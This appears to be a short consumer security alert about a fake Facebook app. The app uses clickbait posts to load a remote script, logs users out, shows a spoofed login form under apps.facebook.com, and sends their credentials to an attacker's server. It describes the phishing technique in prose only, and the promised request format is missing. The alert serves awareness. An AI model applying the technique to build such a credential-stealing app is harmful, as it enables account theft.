Recently, there has been an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook.
Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again
When the user clicks on the “Login” button, it will show the login form.
When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:
Using best practice advice, one can check the URL information bar to determine the destination of the URL—but that isn’t enough in this case. The URL bar will show apps.facebook.com when the login form is displayed, even though the credentials will be posted to a malicious site instead.
The bogus app also “likes” the link in an automatic post, which will be displayed on the user’s profile
A similar attack was also observed to be hosted on the same IP address. It displays a different message: “Video: This is the best April Fools’ prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts
NB: Hence forth, SMS won’t be coming anymore, the alerts are going to be coming to your emails. Thanks for being careful even as you play on the wild (Internet).
Another Fake Facebook App is Here to Steal your Passwords